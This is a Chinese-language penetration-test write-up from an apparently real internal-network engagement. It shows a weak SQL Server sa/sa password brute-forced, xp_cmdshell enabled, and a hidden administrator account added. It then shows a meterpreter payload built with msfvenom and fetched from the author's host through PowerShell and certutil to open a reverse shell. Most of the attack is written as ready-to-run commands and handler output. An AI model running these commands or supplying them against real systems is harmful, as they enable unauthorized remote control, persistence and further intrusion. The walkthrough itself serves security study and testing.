【實戰3】記一次內網中反彈shell的艱難歷程

# 0x00 前言

最近在客戶現場對內網服務器進行滲透測試，發現了大量的弱口令，本次歷程就是從這里開始···

# 0x01 弱口令

對目標ip進行端口掃描，開放端口為80,445,1433,3389
- 訪問80端口，只是一個安裝成功的界面，掃描一下目錄看是否有源碼泄露，無果
- 使用nmap腳本對445端口進行掃描，看是否存在ms17010等漏洞，無果
- 使用超級弱口令工具爆破1433，爆破成功，賬號密碼：sa/sa
- 同時對3389端口進行爆破，無果

因此確定了突破口，使用navicat成功連接sql server數據庫

# 0x02 連接3389

翻了一下，沒什么數據，嘗試拿服務器吧，因此直接新建查詢，開啟xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

 

然后執行命令

exec master..xp_cmdshell "whoami";

是system權限，和想象中的一樣
3389是開着的，不如加個用戶直接連接遠程桌面吧

 

加強密碼強度，重新添加

exec master..xp_cmdshell "net user test paperpen123. /add";
exec master..xp_cmdshell "net localgroup administrators test /add";

一切都很順利，開始連接3389，但遺憾的是

是win7，只允許單用戶登錄，如果擠他的話被發現就不能繼續玩耍了，還是放棄連接3389吧

# 0x03 powershell下載木馬

我還是把shell彈到本地來吧，方便操作，但是說着簡單，該怎么彈呢？
需要強調一點，這里的內網不可以訪問外網，因此無法使用命令從外網下載工具
那么可以這樣，讓他從我的本地服務器下載工具到他的服務器上就可以了
但是要關閉本機防火牆，執行后訪問失敗才想起來。我的ip是195.1.7.23
使用kali生成exe木馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe

本地phpstudy快速搭建環境
將shell.exe放到網站根目錄下，鏈接為http://195.1.7.23/shell.exe
本地監聽8888端口

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 195.1.7.23
LHOST => 195.1.7.23
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > exploit

一切准備就緒，就差服務器執行shell.exe文件了。接下來的命令，大多是我朋友Calendula提供的，感謝一下
經測試，powershell是可以執行命令的，因此執行朋友Calendula給的下載命令

exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient";
exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')";

這兩句本可以合並到一起執行，但是前面嘗試執行其他命令時發現有長度限制

所以拆分進行執行，但是遺憾的是

DownloadFile無法使用，具體因為什么也沒搞清楚，因此放棄了這種方法

# 0x04 證書下載

朋友Calendula又給我提供了一種思路，使用certutil.exe，頓時驚呆、聞所未聞，命令如下：

exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"';

使用dir查看，發現成功下載到了服務器上

# 0x05 反彈成功

就差一步了，輸入下面的命令並緊張地點擊了執行

exec master..xp_cmdshell 'shell.exe';

卡住了···，又執行了一遍，又卡住了···，又執行了一遍，什么情況···
回到監聽界面，打算按下ctrl+c重新監聽，結果進了meterpreter界面，原來是它卡住了···

 

激動地截了張圖

 

查看了一下是不是域環境

沒錯是的，看來還有很長的路要走。。

# 0x06 結語

這次就寫到這吧，如有進展，還會更新。歡迎各位師傅們留言討論，互相交流，互相學習，共同進步。